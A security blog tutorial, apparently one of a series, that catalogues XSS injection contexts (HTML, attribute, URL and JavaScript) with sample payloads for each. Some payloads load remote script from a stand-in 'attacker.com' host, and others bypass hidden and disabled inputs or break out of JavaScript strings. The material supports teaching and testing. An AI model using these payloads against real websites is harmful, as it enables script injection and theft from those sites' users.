Hey Everyone! been a long time since the last post :\ all due to laziness of Zen. So continuing the series, we are gonna talk about different contexts where XSS could occur.
First of all what are XSS contexts?
Contexts for XSS are nothing but the situations or the places/positions where the user input might reflect inside the DOM and if not sanitised or properly encoded then may lead to XSS.
Basic types of contexts where XSS could occur could be:
1. HTML context
2. Attribute context
3. URL context
4. Javascript context
#1. HTML context
This is the simplest contexts where XSS could occur. Its nothing but when the unsanitized userinput is put into the response body as is. This occurs when angular brackets/tags (< or >) are not at all sanitized.
1. title Example:
<title>HTML Context</title>
Some Possible Payloads:
<script src=//attacker.com/evil.js></script>
<svg onload=alert(1)>
<body onload=alert(1)>
<iframe onload=alert(1)>
In order to Inject javascript we need to atleast inject "<" into the response body. A payload like `<svg onload=alert(1)//` would be enough to trigger however there must be a closing tag anywhere below the injected payload
There are certain tags which treat whatever the userinput inside them as raw text and do not render HTML at all. These tags needs to be closed themselves first before executing the payload. Example of this tag is:
1. title Example:
Payload: `</title><script>alert(1)</script>`
2. textarea
Payload: `</textarea><script>alert(1)</script>`
3. xmp
Payload: `</xmp><script>alert(1)</script>`
#2. Attribute Context
Its the case when the User input is inside any attribute's value of the HTML tag. Userinput in this context could be used in conjunction with event handlers to execute javascript. The Userinput inside an attribute could be in 3 ways:
1. Double Quoted Input
2. Single Quoted Input
3. without any quotation
This is also useful when the application is properly filtering/encoding the opening/closing tags
<input type="" name="input" value="{{user input}}"> <!-- double quoted -->
<input type="" name="input" value='{{user input}}'> <!-- single quoted -->
<input type="" name="input" value={{user input}}> <!-- without quotations -->
Some Possible Payloads:
#1. Double quoted
`"autofocus onfocus="alert(1)`
`"autofocus onfocus=alert(1)//`
`"onmouseover="alert(1)//` (Interaction)
`"autofocus onblur="alert(1)` (Interaction)
#2.Single Quoted
`'autofocus onfocus='alert(1)`
`'autofocus onfocus=alert(1)//`
`'onmouseover='alert(1)//` (Interaction)
`'autofocus onblur='alert(1)` (Interaction)
#3. Without Quotations
`aaaa autofocus onfocus=alert(1)//`
`aaaa onbeforescriptexecute=alert(1)//`
`aaaa onmouseover=alert(1)//`
Note 1: You should use the proper event handlers with proper tags by looking at the documentations or some examples on the Internet otherwise not all event handlers work with every tags. There's an article by @brutelogic which contains those event handlers which works with all tags https://brutelogic.com.br/blog/agnostic-event-handlers/
Note 2: Also some tags couldn't execute javascript with any attribute (event handler) one such tag is "meta" tag
**Disabled and Hidden Inputs:**
Sometimes the Userinput could be inside an input which has `type=hidden` or has `disabled` attribute set. In such cases usual event handlers won't work.
1. Hidden Inputs
There are 2 ways to bypass this
a) Accesskey with onclick event (Requires Interaction)
<input type="hidden" value="{{userinput}}" />
Payload: `"accesskey="X" onclick="alert(1)"`
to Trigger the onclick event we then need to press the Key combination Alt+SHIFT+{accesskey} ie. in this case Alt+SHIFT+X
b) This requires the Userinput to be before the `type=hidden` parameter which isn't the case always but if it is then we could execute javascript without interaction by overriding the type attribute of the input tag to anything other than hidden.
<input value="{{userinput}}" type="hidden"/> <!-- notice the position of userinput before type -->
Payload: `" type=xx autofocus onfocus=alert(1)//`
2. Disabled Inputs (Firefox only) :
<input disabled value="{{userinput}}" />
Payload: `"style="position:fixed;top:0;left:0;border:999em solid red;" onmouseover="alert(1)`
Its discovered by Dr. Mario https://twitter.com/0x6D6172696F/status/933325205774139392
#3. URL Context
This is the case where most HTML encoding/filtering in the application doesn't work usually. This occurs due to the userinput into some special attributes in some tags which takes a URL/link and could be used to execute javascript.
1. Script Tag
<script src="{{userinput}}"></script>
The src attribute could be used to load javascript remotely
Payload: `http://attacker.com/evil.js`
2. Anchor Tag
<a href="{{userinput}}">Click</a>
The href attribute of <a> tag could be used to execute javascript with `javascript:` scheme
Payload: `javascript:alert(1)//`
3. Iframe Tag
<iframe src="{{userinput}}" />
The src attribute of <iframe> tag could also be used to execute javascript with `javascript:` scheme
Payload: `javascript:alert(1)//`
4. Base tag
<base href="{{userinput}}">
The href attribute could be used to load javascript remotely so any other href or links such as scripts would be loaded from attacker domain as base.
Payload: `http://attacker.com/evil.js?#`
5. Form Tag
<form action={{userinput}}>
Payload: `javascript:alert(1)//`
6. Frameset
<frameset><frame src="{{userinput}}"></frameset>
Payload: `javascript:alert(1)//`
#4 Javascript context
This happens when the Userinput is put into the javascript inside <script> tags or inside an event handler executing javascript. so what we have to do mostly is break out of any quotes and execute any javascript function directly.
Example #1:
var x="{{userinput}}";// break out of quotes accordingly if its double or single
Some Possible Payload:
Js function can also be used as any other mathematical operand such as ^ (xor), % (modulous) , / (divide) etc..
If the Userinput is directly reflected into some javascript expression without qoutes you might be able to execute javascript functions directly.
Example #2:
var x={{userinput}};
Some Possible Payloads:
So actually all you have to do is break out of the context without making any errors in the syntax of existing javascript and balance up braces/paranthesis etc to execute our javascript otherwise if there's an error introduced in the syntax even after our payload, our javascript will not execute. Let's look at a Complex example
Example #3:
var x=123;
function test(){
if(test =='{{userinput}}'){
Step by Step Solving:
1. Break out of quote and closing "If" such that no error is there
Userinput: `test'){//`
We closed the single quote, closed the right paranthesis of "If", opened up brace to match the closing brace and commented the rest of the line
The Output will look like
function test(){
if(test =='test'){//'){
2. Since the function isn't execute anywhere we need to also break out of the function
Userinput: `test'){1}}//`
This will close the previous function completely without any error. However the rest of the code has a lot of unopened brances and paranthesis.
The Output will look like
function test(){
if(test =='test'){1}}//'){
3. To balance the rest of the code we need to also start a fake/dummy function and if condition inside it
Userinput: `test'){1}};function dummy(){ if(1){//`
so the errors are gone Now we could execute our javascript function just before our dummy function such as:
Userinput: `test'){1}};alert(1);function dummy(){ if(1){//`
4. To make the input small we could also use ES6 arrow function instead of writing a "function dummy()" like:
Userinput: `test'){1}};alert(1);dummy=>{ if(1){//`
final output will look like
function test(){
if(test =='test'){1}};alert(1);dummy=>{ if(1){//'){1}}//'){
I guess that's enough for this tutorial. Next tutorial is where the fun begins with Filter and WAF bypassing tricks & stuffs Stay Tuned :D!